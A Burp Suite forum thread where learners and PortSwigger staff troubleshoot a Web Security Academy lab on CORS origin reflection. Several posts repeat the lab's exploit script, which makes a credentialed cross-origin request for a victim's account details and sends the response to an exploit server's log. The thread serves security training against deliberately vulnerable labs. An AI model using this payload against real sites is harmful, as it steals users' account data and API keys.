Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: CORS vulnerability with basic origin reflection not working

Todd | Last updated: Dec 21, 2022 04:58AM UTC

In this lab, I'm stuck on step 5 of the solution: In the browser, go to the exploit server and enter the following HTML, replacing YOUR-LAB-ID with your unique lab URL: <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> After replacing YOUR-LAB-ID with my lab ID, and then clicking View Exploit, the server appears to hang and I don't get a response. If I click Deliver Exploit to Victim, the server redirects me to the exploit server page.

Todd | Last updated: Dec 21, 2022 05:00AM UTC

Update: CORS lab 2 isn't working either.

Malinga | Last updated: Dec 21, 2022 12:17PM UTC

CORS labs are not working for me either.

Liam, PortSwigger Agent | Last updated: Dec 21, 2022 02:50PM UTC

Thanks for these reports, Todd and Malinga. Our tests are passing for our CORS labs. Do you have another machine/network to test this on?

Todd | Last updated: Dec 22, 2022 01:40AM UTC

Hi, yes, I tried Firefox and Chrome on Mac OS 64 bit ARM, Ubuntu Linux 64 bit ARM, and Windows 64 bit on Intel, from two different networks (different physical locations and IPs as well). Unfortunately the same result in each case. It's a head-scratcher.

Liam, PortSwigger Agent | Last updated: Dec 22, 2022 01:38PM UTC

Hi Todd. We've manually completed the lab today. The lab is also passing our automated testing.

Todd | Last updated: Dec 22, 2022 02:50PM UTC

Could you tell me which OS and browser you're using? Then I can try that combo and see if I can recreate the problem. I know these problems are hard to track down -- it's part of my job too, so I understand. Thanks.

Todd | Last updated: Dec 22, 2022 02:54PM UTC

I tried it again this morning and the key is not in the URL as described in the lab. Here's what I see: https://<redacted>.exploit-server.net/log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22

Liam, PortSwigger Agent | Last updated: Dec 23, 2022 09:49AM UTC

Thanks, Todd. We'll look into this again. However, it is likely to be after the holidays.

Todd | Last updated: Dec 28, 2022 04:18AM UTC

SOLVED The text 'YOUR-LAB-ID' in the lab's solution is not completely correct. Taken literally, this value is just '<random number>.web-security-academy.net'. However, the prefix needs to be included that string for the call to req.open() to work, so the parameter must actually be 'https://<random number>.web-security-academy.net' This solution is clearer: <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script>

Kavitha | Last updated: May 18, 2023 09:42PM UTC

Your Script didn't work for me Todd

Ben, PortSwigger Agent | Last updated: May 19, 2023 06:36AM UTC

Hi Kavitha, Can you provide some details of the steps that you are taking to try and solve this lab so that we can assist you further?

Joe | Last updated: Jun 17, 2023 05:16PM UTC

Didn't work for me either Todd

Damian | Last updated: Jul 07, 2023 12:09PM UTC

Still it doesn't work!

Michelle, PortSwigger Agent | Last updated: Jul 07, 2023 12:47PM UTC

Is there a specific CORS lab you're having issues with, or more than one? Can you please tell us more about the problems you're seeing and at what stage of the lab they occur?

Gareth | Last updated: Sep 04, 2023 08:20AM UTC

Hi all, I am having the same issue with this lab: Lab: CORS vulnerability with basic origin reflection When I enter the JS with my Lab Url, I either receive a page full of GET/POST requests or a blank screen. "GET /log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22 I have tried without the 'https://' and with 'Https://'. Any ideas? Thanks

Michelle, PortSwigger Agent | Last updated: Sep 04, 2023 10:32AM UTC

Hi In step 6, when you view the exploit, you will see the access logs for the exploit server on the main page, but if you check the URL that you have visited in the main URL bar, you should see the additional information. I hope this helps. You might also find it useful to follow along with the community solution video.

Ben | Last updated: Mar 09, 2024 01:35AM UTC

Hi, im having a similar issue as above, but dont know how to fix this. i have tried it on multiple browsers. My script is <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','0a57002f03f4f14e83638cfb00c90073.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> and where the api key WOULD be, there is "GET /log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server, this is also in my URL how do i fix this? I have tried my own browser, the burp chromium, chrome and all not working.

Michelle, PortSwigger Agent | Last updated: Mar 11, 2024 11:20AM UTC

Hi If you add https:// to the URL for your lab and deliver the exploit to the victim, do you see the victim visiting the exploit server?

Pedro | Last updated: Mar 14, 2024 02:26PM UTC

Hello, I am also having this problem. I have tried to follow the solutions step by step, but when i try to view the exploit, it says "Cross-Origin Request Blocked". Here is my script: <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ac2006d036c63208096851200950026.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> I tried it on FireFox and Burp Chromium and neither have worked. Am I missing something? Thank you.

Michelle, PortSwigger Agent | Last updated: Mar 14, 2024 03:24PM UTC

Hi If you deliver the exploit to the victim and then view the access logs for the exploit server, do you see the victim visiting the exploit server at all?

Pedro | Last updated: Mar 14, 2024 04:20PM UTC

I'm pretty sure, according to this line from the log: 10.0.3.181 2024-03-14 16:17:12 +0000 "GET /exploit/ HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

Michelle, PortSwigger Agent | Last updated: Mar 14, 2024 04:21PM UTC

Were there any other lines from that source IP in the logs?

Pedro | Last updated: Mar 14, 2024 04:25PM UTC

No, this was the only one

Michelle, PortSwigger Agent | Last updated: Mar 15, 2024 11:13AM UTC

Hi Thanks for checking. I've just tested delivering the exploit to the victim and saw 3 entries in the access log from the victim's IP. I used the following script on the exploit server <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://<lab-id>.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> Can you give this another go and let me know what you see? If you're still having issues, can you send some screenshots or a screen recording of the steps you're taking and what you see to support@portswigger.net, please?

Pedro | Last updated: Mar 15, 2024 02:31PM UTC

Hello, I've tried it again and it worked. I have no idea what happened but thanks anyway! :)

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.